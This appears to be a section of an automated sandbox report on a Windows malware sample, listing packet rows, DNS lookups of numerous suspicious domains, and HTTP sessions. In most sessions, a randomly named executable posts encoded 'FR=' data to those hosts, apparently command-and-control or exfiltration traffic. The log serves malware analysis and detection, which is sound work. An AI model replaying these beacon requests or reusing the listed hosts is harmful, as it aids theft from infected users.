              Sep 6, 2024 09:07:52.164781094 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:07:54.061944008 CEST80497705.144.130.52192.168.2.6
              Sep 6, 2024 09:07:54.062067032 CEST4977080192.168.2.65.144.130.52
              Sep 6, 2024 09:07:56.600569963 CEST80497715.144.130.52192.168.2.6
              Sep 6, 2024 09:07:56.601450920 CEST4977180192.168.2.65.144.130.52
              Sep 6, 2024 09:07:59.151722908 CEST80497725.144.130.52192.168.2.6
              Sep 6, 2024 09:07:59.152502060 CEST4977280192.168.2.65.144.130.52
              Sep 6, 2024 09:08:01.970495939 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:08:01.970628977 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:08:01.970753908 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:08:01.973819971 CEST4977380192.168.2.65.144.130.52
              Sep 6, 2024 09:08:01.978605032 CEST80497735.144.130.52192.168.2.6
              Sep 6, 2024 09:08:07.027517080 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:07.032499075 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.035551071 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:07.047419071 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:07.052277088 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.624213934 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.624473095 CEST8049774162.241.226.190192.168.2.6
              Sep 6, 2024 09:08:07.624536037 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:08.551021099 CEST4977480192.168.2.6162.241.226.190
              Sep 6, 2024 09:08:09.572468042 CEST4977580192.168.2.6162.241.226.190
              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
              Sep 6, 2024 09:04:57.576793909 CEST | 192.168.2.6 | 1.1.1.1 | 0xf7f4 | Standard query (0) | www.omexai.info | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:13.117464066 CEST | 192.168.2.6 | 1.1.1.1 | 0x8e4 | Standard query (0) | www.030003678.xyz | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:26.570178986 CEST | 192.168.2.6 | 1.1.1.1 | 0x6258 | Standard query (0) | www.sorriragora.online | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:40.336082935 CEST | 192.168.2.6 | 1.1.1.1 | 0x2da2 | Standard query (0) | www.homebizsuccess.blog | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:59.300692081 CEST | 192.168.2.6 | 1.1.1.1 | 0x395f | Standard query (0) | www.hm62t.top | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:13.307261944 CEST | 192.168.2.6 | 1.1.1.1 | 0x3ad7 | Standard query (0) | www.318st.com | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:21.403269053 CEST | 192.168.2.6 | 1.1.1.1 | 0xb4a8 | Standard query (0) | www.030002721.xyz | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:34.851771116 CEST | 192.168.2.6 | 1.1.1.1 | 0xd2fc | Standard query (0) | www.lumixy.online | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:48.257519960 CEST | 192.168.2.6 | 1.1.1.1 | 0x6060 | Standard query (0) | www.kalomor.top | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:02.024760962 CEST | 192.168.2.6 | 1.1.1.1 | 0x6ec9 | Standard query (0) | www.henrry.top | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:16.601383924 CEST | 192.168.2.6 | 1.1.1.1 | 0x3a90 | Standard query (0) | www.1win-moldovia.fun | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:30.321420908 CEST | 192.168.2.6 | 1.1.1.1 | 0xac97 | Standard query (0) | www.thewhitediamond.org | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:44.414532900 CEST | 192.168.2.6 | 1.1.1.1 | 0x59b0 | Standard query (0) | www.aflaksokna.com | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:08:06.995609999 CEST | 192.168.2.6 | 1.1.1.1 | 0x1753 | Standard query (0) | www.easyanalytics.site | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:08:20.306886911 CEST | 192.168.2.6 | 1.1.1.1 | 0x9831 | Standard query (0) | www.moveon.cat | A (IP address) | IN (0x0001) | false
              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
              Sep 6, 2024 09:04:57.600860119 CEST | 1.1.1.1 | 192.168.2.6 | 0xf7f4 | No error (0) | www.omexai.info | omexai.info |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:04:57.600860119 CEST | 1.1.1.1 | 192.168.2.6 | 0xf7f4 | No error (0) | omexai.info |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:04:57.600860119 CEST | 1.1.1.1 | 192.168.2.6 | 0xf7f4 | No error (0) | omexai.info |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:13.217022896 CEST | 1.1.1.1 | 192.168.2.6 | 0x8e4 | No error (0) | www.030003678.xyz | 030003678.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:05:13.217022896 CEST | 1.1.1.1 | 192.168.2.6 | 0x8e4 | No error (0) | 030003678.xyz |  | 65.21.196.90 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:27.104013920 CEST | 1.1.1.1 | 192.168.2.6 | 0x6258 | No error (0) | www.sorriragora.online | sorriragora.online |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:05:27.104013920 CEST | 1.1.1.1 | 192.168.2.6 | 0x6258 | No error (0) | sorriragora.online |  | 162.240.81.18 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:41.013298035 CEST | 1.1.1.1 | 192.168.2.6 | 0x2da2 | No error (0) | www.homebizsuccess.blog | homebizsuccess.blog |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:05:41.013298035 CEST | 1.1.1.1 | 192.168.2.6 | 0x2da2 | No error (0) | homebizsuccess.blog |  | 192.185.16.209 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:05:59.730976105 CEST | 1.1.1.1 | 192.168.2.6 | 0x395f | No error (0) | www.hm62t.top | hm62t.top |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:05:59.730976105 CEST | 1.1.1.1 | 192.168.2.6 | 0x395f | No error (0) | hm62t.top |  | 154.23.184.240 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:13.341367006 CEST | 1.1.1.1 | 192.168.2.6 | 0x3ad7 | Name error (3) | www.318st.com | none | none | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:21.487642050 CEST | 1.1.1.1 | 192.168.2.6 | 0xb4a8 | No error (0) | www.030002721.xyz | 030002721.xyz |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:06:21.487642050 CEST | 1.1.1.1 | 192.168.2.6 | 0xb4a8 | No error (0) | 030002721.xyz |  | 65.21.196.90 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:34.907738924 CEST | 1.1.1.1 | 192.168.2.6 | 0xd2fc | No error (0) | www.lumixy.online |  | 184.94.212.115 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:06:48.543200016 CEST | 1.1.1.1 | 192.168.2.6 | 0x6060 | No error (0) | www.kalomor.top | kalomor.top |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:06:48.543200016 CEST | 1.1.1.1 | 192.168.2.6 | 0x6060 | No error (0) | kalomor.top |  | 91.215.85.23 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:02.738656998 CEST | 1.1.1.1 | 192.168.2.6 | 0x6ec9 | No error (0) | www.henrry.top |  | 121.199.37.19 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:16.925210953 CEST | 1.1.1.1 | 192.168.2.6 | 0x3a90 | No error (0) | www.1win-moldovia.fun |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:16.925210953 CEST | 1.1.1.1 | 192.168.2.6 | 0x3a90 | No error (0) | www.1win-moldovia.fun |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:30.340076923 CEST | 1.1.1.1 | 192.168.2.6 | 0xac97 | No error (0) | www.thewhitediamond.org | thewhitediamond.org |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:07:30.340076923 CEST | 1.1.1.1 | 192.168.2.6 | 0xac97 | No error (0) | thewhitediamond.org |  | 3.33.130.190 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:30.340076923 CEST | 1.1.1.1 | 192.168.2.6 | 0xac97 | No error (0) | thewhitediamond.org |  | 15.197.148.33 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:07:44.497714043 CEST | 1.1.1.1 | 192.168.2.6 | 0x59b0 | No error (0) | www.aflaksokna.com | aflaksokna.com |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:07:44.497714043 CEST | 1.1.1.1 | 192.168.2.6 | 0x59b0 | No error (0) | aflaksokna.com |  | 5.144.130.52 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:08:07.023472071 CEST | 1.1.1.1 | 192.168.2.6 | 0x1753 | No error (0) | www.easyanalytics.site | easyanalytics.site |  | CNAME (Canonical name) | IN (0x0001) | false
              Sep 6, 2024 09:08:07.023472071 CEST | 1.1.1.1 | 192.168.2.6 | 0x1753 | No error (0) | easyanalytics.site |  | 162.241.226.190 | A (IP address) | IN (0x0001) | false
              Sep 6, 2024 09:08:20.346628904 CEST | 1.1.1.1 | 192.168.2.6 | 0x9831 | No error (0) | www.moveon.cat |  | 217.160.0.193 | A (IP address) | IN (0x0001) | false
              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              0 | 192.168.2.6 | 49723 | 3.33.130.190 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:04:57.620086908 CEST | 529 | OUT | GET /v7i9/?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.omexai.info
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:04:58.073688030 CEST | 405 | IN | HTTP/1.1 200 OK
              Server: openresty
              Date: Fri, 06 Sep 2024 07:04:58 GMT
              Content-Type: text/html
              Content-Length: 265
              Connection: close
              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?FR=gVd2Q54c4wAw8FSZkJGisnGWxrnrZZv7nPVFwBxZuIdr/R+LakyKOxGnexM5cwgplfvhbdxFrnk6Pq1kbTlH0ZjmVJXvVLu8DIcVEX5jt3TfiQ8a19HD/2BSGQQXtF0fkmM7X0U=&yXghy=KTox"}</script></head></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              1 | 192.168.2.6 | 49725 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:13.238421917 CEST | 794 | OUT | POST /wft4/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030003678.xyz
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030003678.xyz
              Referer: http://www.030003678.xyz/wft4/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=VRMqz/UyqXRE0r15rSVRPIlhwIPQokTVrxte3tfbL6a3m4O/KPhVBCxULsx1eF1PIXn5NawAxd7clrnFL4rDpLQMv6YzLO3rfylHtA5X+rQJJEajBgV5SfzCzZtHhXgSC8KiP4Jq/EUhbfHtedR32k/NnwvqZg26lux4LTSZ+Jkhm+xRwQIKADk6sJMSpLLf2xPsuNpL+MQd
              Sep 6, 2024 09:05:13.887362957 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:13 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.6 | 49727 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:15.788914919 CEST | 818 | OUT | POST /wft4/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030003678.xyz
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030003678.xyz
              Referer: http://www.030003678.xyz/wft4/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=VRMqz/UyqXREyLF5qx9RJolg/oPQxUTZrxpe3sbxMIO3mdq/LOhVCCxUAMxwaF1UIXrxNbMAxdvclubFLPXAvLQOkaY1Eu3rfylHtEpp+rYJJ3CjAE5+b/zB0ZtHlXhbC8K6P69A/CQhba7tev525k/L5wuHV1LQlOk4Dw6/iOpAuowLsjIpSTE4sLUgprL10x3s8alsx41+um7qo4dvwXjuDg9fK6BVxw==
              Sep 6, 2024 09:05:16.457181931 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:16 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.6 | 49728 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:18.334827900 CEST | 1831 | OUT | POST /wft4/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.030003678.xyz
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.030003678.xyz
              Referer: http://www.030003678.xyz/wft4/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR= [TRUNCATED]
              Sep 6, 2024 09:05:18.984230042 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:18 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.6 | 49729 | 65.21.196.90 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:20.879736900 CEST | 531 | OUT | GET /wft4/?FR=YTkKwJ8ciWwfk9EboTVmJ8A8z5nQoA6H/11M7sDGKdLnpvCCOp1eIxB3H/IGbE8NJw3dU7UJgJnjxevpFaH+9r0+hPUAaenfY1NUgmg0rJlUJj6QFUl1BdaUrKMG7GtZPuGkbd0=&yXghy=KTox HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Host: www.030003678.xyz
              Connection: close
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Sep 6, 2024 09:05:21.548053026 CEST | 1032 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 796
              date: Fri, 06 Sep 2024 07:05:21 GMT
              vary: User-Agent
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.6 | 49731 | 162.240.81.18 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:27.122359991 CEST | 809 | OUT | POST /wxmz/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.sorriragora.online
              Content-Length: 207
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.sorriragora.online
              Referer: http://www.sorriragora.online/wxmz/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=y1TU7gLT4jEuIZwk24Yo2+j4OwRz3X9bqbgDB2hYnhekiobggJWL0s6jiE4zhN1lHF7DFAp0dbXJ1wvmh2cqZFsqvbuTm9EfoECRKNTEF4fU9oPfK4YfYBVwKYdO+vayDpZO1+7/Nk/qv38PPIkK73C9AywO5PlRorstLh/GiqkwoZWhbk+8xx9IX8mBfpGo7Z3Jjk+1WRWn
              Sep 6, 2024 09:05:27.679925919 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:27 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:27.679946899 CEST | 1236 | IN | Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
              Sep 6, 2024 09:05:27.679959059 CEST | 1236 | IN | Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
              Sep 6, 2024 09:05:27.679971933 CEST | 115 | IN | Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              6 | 192.168.2.6 | 49732 | 162.240.81.18 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:29.664473057 CEST | 833 | OUT | POST /wxmz/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.sorriragora.online
              Content-Length: 231
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.sorriragora.online
              Referer: http://www.sorriragora.online/wxmz/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=y1TU7gLT4jEuaJgk0bgomuj7CQRzgH9XqbsDB30FnUGkiKTghKOL5M6j604yvt1sHF3hFB50dbTJ10rmhlkrYVtM6LuVpdEfoECRKNH+F43U+YTfbpYeexVzdodO0Pa2DpYp17jRNm3qv2MPPcJcinCBOSxL38UooJRNLR2q8ZYMgPX7HX+fjhdKX++zfJGC5ZPJxzySZlzE7IC7VB8nBMWQSsbsrxNkjA==
              Sep 6, 2024 09:05:30.217308998 CEST | 1236 | IN | HTTP/1.1 404 Not Found
              Server: nginx/1.20.1
              Date: Fri, 06 Sep 2024 07:05:30 GMT
              Content-Type: text/html
              Content-Length: 3650
              Connection: close
              ETag: "663a05b6-e42"
              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
              Sep 6, 2024 09:05:30.217325926 CEST | 224 | IN | Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
              Sep 6, 2024 09:05:30.217344046 CEST | 1236 | IN | Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
              Sep 6, 2024 09:05:30.217359066 CEST | 1127 | IN | Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              7 | 192.168.2.6 | 49733 | 162.240.81.18 | 80 | 5412 | C:\Program Files (x86)\XuvexbTLKYVuVqWZKsvaiIuwpSYlGPUjGrZIeZpqcwSiuvFK\toceDGfrPzLv.exe
              Timestamp | Bytes transferred | Direction | Data
              Sep 6, 2024 09:05:32.211046934 CEST | 1846 | OUT | POST /wxmz/ HTTP/1.1
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Accept-Encoding: gzip, deflate, br
              Host: www.sorriragora.online
              Content-Length: 1243
              Cache-Control: no-cache
              Content-Type: application/x-www-form-urlencoded
              Connection: close
              Origin: http://www.sorriragora.online
              Referer: http://www.sorriragora.online/wxmz/
              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
              Data Ascii: FR=y1TU7gLT4jEuaJgk0bgomuj7CQRzgH9XqbsDB30FnXmki/fggqyL2s6jkE4vvt08HF/lFEh7dZbJ0R/mwkkrWVtM4LuQm9EKoAedKNX+F43U+anfb4YecxVwKYdK+vaeDpRW17vvNWXqvWcPMplcqnC5Pixt38YJoNx3LSr38aEMqJC3f2ykwTdtA+G6Tu+Kzpfw9zuxW2at+Nu3USRlC/SpOoi0qFQO79FbTNP4jMiePz93B/Esk2uq+LfQy12zK/Hkm4tbCDggW3RBShVbUuqXNYXiDf+TPDyQF0873sim0uetzwAJ0ohp/qawLtUnhQCJWrHKMJec8SLXTxRcGUcNlTMyikGykI+/q6xjiM7EPGzL9VyuoKHfY7yrnPW5Nj/CnVyh6G4mjWSIdinrhF5zq547NHuFOnGCENT3kuO3UFtgIGuXC0NvcSHfYzK0mc6IgYl3dXN1L6tfoKH+OXNLZUDKVa5YG/Y41o1zAXT7oQsUSQ7CdBHG+yMCoBriwNsJp2092/zD27tWngy2QgUM6oqyyksDoMZ5Ep+aDsrUy7sZipAIck9oHLUHlxpPFJkaWWv943EQnHuw/CjwcqSpbcnpbJFMxlUa9U4bDpj300f1RrFYO5Lsg7kfCQ5ayP2RLepqlyVD11fLrwxhJzFr6s60tkGI3YpRhPjAAU/KkUSKFnneucd52YY8/Im+iiTke/CZMRM7IXlauU6nBUzXEsEwdmpU2gpLUF2pCfPaJhrROs5W/EHVd/yOKwy5Ocsczir+RfFu+gMMgI4keNRA2M4oHsMu582mN2mDIRSrjswSgn+UxT5w9miUKgMpGfk6KGx8ZcN9tX7m6fllKHzzc36ZkT8P/LRNdb+TZfF0gNSJhAyhiGo9+9aH7REZ35jca+7pXCXJ62RPHIAxYeO+fHg22sHEBGUAY2INdc3X2P2nDImPY0By74JU6JAFtFNPd3RdpfopH2AUwIIsgTjxf9CSHXko4HvvBthrijm+sTnkL [TRUNCATED]
